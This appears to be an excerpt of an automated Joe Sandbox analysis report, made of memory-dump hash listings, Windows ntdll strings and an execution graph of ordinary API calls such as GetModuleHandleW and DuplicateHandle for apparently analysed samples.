                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 43352d59d462a3a7cb4366a31fb4e8b2b6e55e2f60afc1459e92890d3fb069dd
                                                • Instruction ID: d8aa717e2d926e52fe640daefae7341d57deb02b0458d934e06a0f39e246aec9
                                                • Opcode Fuzzy Hash: 43352d59d462a3a7cb4366a31fb4e8b2b6e55e2f60afc1459e92890d3fb069dd
                                                • Instruction Fuzzy Hash: FF90023520181402D10471584908747001597D0302F55C011E5165555EC765C9916632
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cb9d6fee9a5037a0819eeec524b824bcf9d87e16631c0b0e74c0af549e8d68c1
                                                • Instruction ID: 8e9511a4480ca6875ac8a8d501e615d84110705e92635337489473cad477fe27
                                                • Opcode Fuzzy Hash: cb9d6fee9a5037a0819eeec524b824bcf9d87e16631c0b0e74c0af549e8d68c1
                                                • Instruction Fuzzy Hash: 9F900225211C1042D20475684D14B07001597D0303F55C115E0155554CCA1589615622
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c16a259b5507832d746b5abb34e01aba59367ad42b07fa6b868ffdc379a6234
                                                • Instruction ID: db19ff05ecca9f4e0243c14d4cf6b9d5bf3ed311d110ee75f629bd36535b7433
                                                • Opcode Fuzzy Hash: 9c16a259b5507832d746b5abb34e01aba59367ad42b07fa6b868ffdc379a6234
                                                • Instruction Fuzzy Hash: 4390022530141402D106715845146060019D7D1345F95C012E1425555DC7258A53A233
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b06ac1765d63d900840d8716866a092bdf3960384e665c377355681771c2c7d
                                                • Instruction ID: f0780229645441a97bce7bdc9690725d92ec76667d63c42cd9b8a46ee411b633
                                                • Opcode Fuzzy Hash: 2b06ac1765d63d900840d8716866a092bdf3960384e665c377355681771c2c7d
                                                • Instruction Fuzzy Hash: 6C90022560141502D10571584504616001A97D0241F95C022E1025555ECB258A92A232
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 323bac5bf558bddd9392d0479da572adeee7e556daebebe8248ad39427bd54b1
                                                • Instruction ID: 032d6e2ca38e5617af15e95b08155fa38eef7bcbe7e6c03c12b311794a30b891
                                                • Opcode Fuzzy Hash: 323bac5bf558bddd9392d0479da572adeee7e556daebebe8248ad39427bd54b1
                                                • Instruction Fuzzy Hash: 6190047530141403D144715C45047470015D7D0301F55C011F5075554FC75DCFD57777
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7187245e8c0f558cef8e482d379e714a9aef57ef9ab433178f88161db8a46890
                                                • Instruction ID: 9940581e97fd847cc0ed2ebbb24305afd6386be4a3a0a295363154460ccd7293
                                                • Opcode Fuzzy Hash: 7187245e8c0f558cef8e482d379e714a9aef57ef9ab433178f88161db8a46890
                                                • Instruction Fuzzy Hash: A790026520181403D14475584904607001597D0302F55C011E2065555ECB298D516236
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e9f8cc82dbf0efbf691f5e033580f0fe3cb39431088545d19b5560c8c31db96
                                                • Instruction ID: 1b7b9813fbbdc18c88761979190edde1d944bb53257e3371c2ac896b6d60f9e6
                                                • Opcode Fuzzy Hash: 2e9f8cc82dbf0efbf691f5e033580f0fe3cb39431088545d19b5560c8c31db96
                                                • Instruction Fuzzy Hash: 7390022520185442D14472584904B0F411597E1202F95C019E4157554CCA1589555722
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6560ecfbad82887250e814766aefd24534171d3aa740682cded4691952fa302d
                                                • Instruction ID: bd1099dd4435e66a2bef9a4ada460972d153ea4689f3cecd4699aef5bb619023
                                                • Opcode Fuzzy Hash: 6560ecfbad82887250e814766aefd24534171d3aa740682cded4691952fa302d
                                                • Instruction Fuzzy Hash: DD90022524141802D144715885147070016D7D0601F55C011E0025554DC7168A6567B2
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f6424d39d4392a68220fc6af12ca7e5806cd5f6bd8f8b809c275f8e0fd2afcdf
                                                • Instruction ID: ecc817c627578f221261662e3fa6203cd068ff23c91c73d84d64de36973240b3
                                                • Opcode Fuzzy Hash: f6424d39d4392a68220fc6af12ca7e5806cd5f6bd8f8b809c275f8e0fd2afcdf
                                                • Instruction Fuzzy Hash: 7290043534547103D154715C45047174015F7F0301F55C031F0C155D4DC755CD557333
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8c3a5f0306769cbdc1c22f0ed0845af2324757a1c3c998fb01634019bb3b47c7
                                                • Instruction ID: edd5042e6fb6371ebcfe42e05c16972df5c8722b9774e8386485b62c19d87b68
                                                • Opcode Fuzzy Hash: 8c3a5f0306769cbdc1c22f0ed0845af2324757a1c3c998fb01634019bb3b47c7
                                                • Instruction Fuzzy Hash: 7F90023520241142954472585904A4E411597E1302B95D415E0016554CCA1489615322
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cd2b6c88719ec287d9975dfefc02c72eda24b60758746ac36cc315085171d2d8
                                                • Instruction ID: 6f73ef49ce9d53d01c67d3e4f58e21328f58e6c142e06d3458fd1e2416deaf46
                                                • Opcode Fuzzy Hash: cd2b6c88719ec287d9975dfefc02c72eda24b60758746ac36cc315085171d2d8
                                                • Instruction Fuzzy Hash: B990023920141402D51471585904646005697D0301F55D411E0425558DC75489A1A222
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: f50c2a332d6ecf4a94890fbdc1e7e8f755e852d62214f9b67cbc070c094e8110
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                Strings
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011F46FC
                                                • Execute=1, xrefs: 011F4713
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 011F4655
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 011F4787
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 011F4725
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 011F4742
                                                • ExecuteOptions, xrefs: 011F46A0
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: adc28a5336ab2bb357234ed6d85dc1152cf60d02030d1956bbf63129a4f831fc
                                                • Instruction ID: e98d55b95007f403fbe6ef2e5358a47b5e0079b0a13655b731bcf580d99a8546
                                                • Opcode Fuzzy Hash: adc28a5336ab2bb357234ed6d85dc1152cf60d02030d1956bbf63129a4f831fc
                                                • Instruction Fuzzy Hash: 51513931A002197AEF2DABA8ECD9FFE77A8AF98704F04019DD605A71C1E7719A418F51
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction ID: 802d2273c66ed54bf74238e9f6b9068f91ebff6420fdc5118e43c5edf3778748
                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction Fuzzy Hash: D081A070E092599EEF2D8EACC8527FEBBB1AF65BA0F18411DD851E72D1C7348840CB59
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: 094a33a492c6c47f4dc24acc6ffdf382112ff50819ecea5403f4d65cea6a2988
                                                • Instruction ID: 711b3bcae142224257ff337682654c744e877b20df3cb5642e44ba5be12cc516
                                                • Opcode Fuzzy Hash: 094a33a492c6c47f4dc24acc6ffdf382112ff50819ecea5403f4d65cea6a2988
                                                • Instruction Fuzzy Hash: C52167B6A1011AABDB14DF79DD44AEEBBF8EF94644F040119EA45E3201E731DA018BE1
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 011F031E
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011F02BD
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011F02E7
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 42f2ac342969890b2b4bc607886b77f1c831c47e9a1b9ea8f317dc04004a5ca7
                                                • Instruction ID: 00fa435888f7e959e83dee6f8eae194e1a83379cb4cceb3159fe4267e7967a6b
                                                • Opcode Fuzzy Hash: 42f2ac342969890b2b4bc607886b77f1c831c47e9a1b9ea8f317dc04004a5ca7
                                                • Instruction Fuzzy Hash: C6E1BF746087429FD72DCF28C884B2ABBE1FB88714F540A1DF6A58B2D2D774D845CB52
                                                Strings
                                                • RTL: Resource at %p, xrefs: 011F7B8E
                                                • RTL: Re-Waiting, xrefs: 011F7BAC
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 011F7B7F
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: e5fa16415fc473cdeb544d2d61a761fc6a135292d1ef25e1a8f008593757cdc4
                                                • Instruction ID: 5c5cfed05af177d0dc334640eb7f457773d92891b0729f6265a0d04c212356ab
                                                • Opcode Fuzzy Hash: e5fa16415fc473cdeb544d2d61a761fc6a135292d1ef25e1a8f008593757cdc4
                                                • Instruction Fuzzy Hash: A54107313097069FD729DE29CC80BAAB7E5EF99710F000A1DFA56D7A80DB31E405CB96
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011F728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 011F72A3
                                                • RTL: Re-Waiting, xrefs: 011F72C1
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 011F7294
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: 7308da1af4438eb1f82457badef00f86faa89cae1540024a96d7b0cd324f46d6
                                                • Instruction ID: 919164c72430e2276c44571b48d1af31ef7705077e998ee417b47e6c1f39d233
                                                • Opcode Fuzzy Hash: 7308da1af4438eb1f82457badef00f86faa89cae1540024a96d7b0cd324f46d6
                                                • Instruction Fuzzy Hash: F141F035608602AFD729DE29CC81FAAB7A5FB94710F10061DFA56AB680DB31E812C7D5
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 1760823b2f64c3d6d9086654b79ae05be0c998bdbf546a7aba4414aa1039daaa
                                                • Instruction ID: baa5a718e657b6002d7d6f2ef0df309000360e820d6575f1bb6d22cb18514813
                                                • Opcode Fuzzy Hash: 1760823b2f64c3d6d9086654b79ae05be0c998bdbf546a7aba4414aa1039daaa
                                                • Instruction Fuzzy Hash: 42317872A1021ADFDB24DF2DDC40BEEB7F8EF54610F544559E949E3240EB30AA459BA0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction ID: 652ef2780f8fae74a4b97a62eb2a6249f51033804ea5d8b4fafc4c1c20b919dd
                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction Fuzzy Hash: 7291A671E002169BDB2CDF6DC8C16BEBBA5AF64B20F14451EE965E72C0D7B08941CF52
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: 5468bd9e8881d52c6103ec385dfdc3031f41674d3ee416c8cd1f3019e302b637
                                                • Instruction ID: c21129b17db58b0998d3adf72c89bda28b2b6009761f87beaa8973be2c8b94ea
                                                • Opcode Fuzzy Hash: 5468bd9e8881d52c6103ec385dfdc3031f41674d3ee416c8cd1f3019e302b637
                                                • Instruction Fuzzy Hash: 6A812E71D006699BDB39DB94CC44BEEB7B8AF48714F0041DAEA19B7240D7705E84CFA0
                                                APIs
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0120CFBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: CallFilterFunc@8
                                                • String ID: @$@4Qw@4Qw
                                                • API String ID: 4062629308-2383119779
                                                • Opcode ID: 9dba31561de1362d8fe39cf1a962e30cd376cc1f82cf4dfa5681eb5ff61de56b
                                                • Instruction ID: 7597a56dbe69ea9aada6a7299bd36970c7213a6d3ec8199614ac369c22460d34
                                                • Opcode Fuzzy Hash: 9dba31561de1362d8fe39cf1a962e30cd376cc1f82cf4dfa5681eb5ff61de56b
                                                • Instruction Fuzzy Hash: AC41D671911219DFDB26DFE9C840AAEBBB9FF54B54F00422EEA14DB295D770C801CB61

                                                Execution Graph

                                                Execution Coverage:7.5%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:38
                                                Total number of Limit Nodes:5
                                                execution_graph 30870 176acf0 30874 176ade8 30870->30874 30879 176add8 30870->30879 30871 176acff 30875 176ae1c 30874->30875 30876 176adf9 30874->30876 30875->30871 30876->30875 30877 176b020 GetModuleHandleW 30876->30877 30878 176b04d 30877->30878 30878->30871 30880 176ae1c 30879->30880 30881 176adf9 30879->30881 30880->30871 30881->30880 30882 176b020 GetModuleHandleW 30881->30882 30883 176b04d 30882->30883 30883->30871 30884 176d478 30885 176d47d 30884->30885 30889 176d647 30885->30889 30892 176d658 30885->30892 30886 176d5ab 30890 176d686 30889->30890 30895 176b7d0 30889->30895 30890->30886 30893 176b7d0 DuplicateHandle 30892->30893 30894 176d686 30893->30894 30894->30886 30896 176d6c0 DuplicateHandle 30895->30896 30898 176d756 30896->30898 30898->30890 30899 1764668 30900 176467a 30899->30900 30901 1764686 30900->30901 30903 1764778 30900->30903 30904 176479d 30903->30904 30908 1764878 30904->30908 30912 1764888 30904->30912 30910 17648af 30908->30910 30909 176498c 30909->30909 30910->30909 30916 17644b4 30910->30916 30913 17648af 30912->30913 30914 176498c 30913->30914 30915 17644b4 CreateActCtxA 30913->30915 30915->30914 30917 1765918 CreateActCtxA 30916->30917 30919 17659db 30917->30919

                                                Control-flow Graph

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0176B03E
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1785088221.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1760000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 6ebfb80a6dd63edc690abbde93838edf3fb90b1329ba24bedb3cf5ebc2d24696
                                                • Instruction ID: 0afe686da7a1f3d91d9aa55dd0d359025928b0922749968f89cd3ab20514fd72
                                                • Opcode Fuzzy Hash: 6ebfb80a6dd63edc690abbde93838edf3fb90b1329ba24bedb3cf5ebc2d24696
                                                • Instruction Fuzzy Hash: 24714770A00B058FD724DF2AD44579AFBF5FF88204F00892DD94AE7A40D775E849CB95

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 59 17644b4-17659d9 CreateActCtxA 62 17659e2-1765a3c 59->62 63 17659db-17659e1 59->63 70 1765a3e-1765a41 62->70 71 1765a4b-1765a4f 62->71 63->62 70->71 72 1765a60 71->72 73 1765a51-1765a5d 71->73 75 1765a61 72->75 73->72 75->75
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 017659C9
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1785088221.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1760000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 4c6574ff3a721724b1d545434ef3458bb5178c89a330a6d1af3bebfe8dfe89b4
                                                • Instruction ID: 17c2c8853d467616c940d4d125fb83a081aedae0623d3d123fea2e89e4f4c4ce
                                                • Opcode Fuzzy Hash: 4c6574ff3a721724b1d545434ef3458bb5178c89a330a6d1af3bebfe8dfe89b4
                                                • Instruction Fuzzy Hash: 4E41D2B1C0071DCFDB24DFA9C884B8EBBB5BF49704F20816AD808AB251DB755945CF90

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 76 176590c-17659d9 CreateActCtxA 78 17659e2-1765a3c 76->78 79 17659db-17659e1 76->79 86 1765a3e-1765a41 78->86 87 1765a4b-1765a4f 78->87 79->78 86->87 88 1765a60 87->88 89 1765a51-1765a5d 87->89 91 1765a61 88->91 89->88 91->91
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 017659C9
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1785088221.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1760000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 4ad452f9645053142f0e5af261269d0517c18382d9376707ad65ebe96e7250f3
                                                • Instruction ID: b31959e1f287578c363d6cc818e99a9c03b163a5474b0baa9057d9685e02be1c
                                                • Opcode Fuzzy Hash: 4ad452f9645053142f0e5af261269d0517c18382d9376707ad65ebe96e7250f3
                                                • Instruction Fuzzy Hash: 4041EFB1D0072ACFDB24DFA9C884BCEBBB5BF89714F20816AD408AB251DB755945CF50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 92 176b7d0-176d754 DuplicateHandle 95 176d756-176d75c 92->95 96 176d75d-176d77a 92->96 95->96
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0176D686,?,?,?,?,?), ref: 0176D747
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1785088221.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1760000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 55620a876494d645234c5141f4781971bf8364d2d539ee7b1038a7f6ba357e6d
                                                • Instruction ID: a8e0147de1e9775082dfdc946514067088e19177ca3ac7456f607f4ff5756d6b
                                                • Opcode Fuzzy Hash: 55620a876494d645234c5141f4781971bf8364d2d539ee7b1038a7f6ba357e6d
                                                • Instruction Fuzzy Hash: BB21E6B59003499FDB10CF9AD484ADEFBF8FB48310F14841AE954A3350D379A954CFA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 99 176d6b9-176d6be 100 176d6c5-176d754 DuplicateHandle 99->100 101 176d6c0-176d6c4 99->101 102 176d756-176d75c 100->102 103 176d75d-176d77a 100->103 101->100 102->103
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0176D686,?,?,?,?,?), ref: 0176D747
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1785088221.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1760000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: eecc8802d840e4aa2b718999aa3da190c97575d71ff0f25e34afae4ab60acb20
                                                • Instruction ID: 6320ee16e03a66ce8671db9911829c46377c1c4b0a2563088c669991154ec8c3
                                                • Opcode Fuzzy Hash: eecc8802d840e4aa2b718999aa3da190c97575d71ff0f25e34afae4ab60acb20
                                                • Instruction Fuzzy Hash: E721E6B59003499FDB10CF9AD884ADEFBF8FB48310F14841AE954A3351D378A944CF65

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 106 176afd8-176b018 108 176b020-176b04b GetModuleHandleW 106->108 109 176b01a-176b01d 106->109 110 176b054-176b068 108->110 111 176b04d-176b053 108->111 109->108 111->110
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0176B03E
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1785088221.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_1760000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 98e533585b50ea62279c5c1cb439ed8592f7c1fe4079e133e54d3a0a0fde6ef7
                                                • Instruction ID: 61f7185c30391199e4e0f6c8fd6f74628d7b5518c32ed84be6dac316d0bdb8fd
                                                • Opcode Fuzzy Hash: 98e533585b50ea62279c5c1cb439ed8592f7c1fe4079e133e54d3a0a0fde6ef7
                                                • Instruction Fuzzy Hash: C61113B5D007498FDB10CF9AC444BDEFBF8AB88210F10841AD929A7600D379A545CFA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
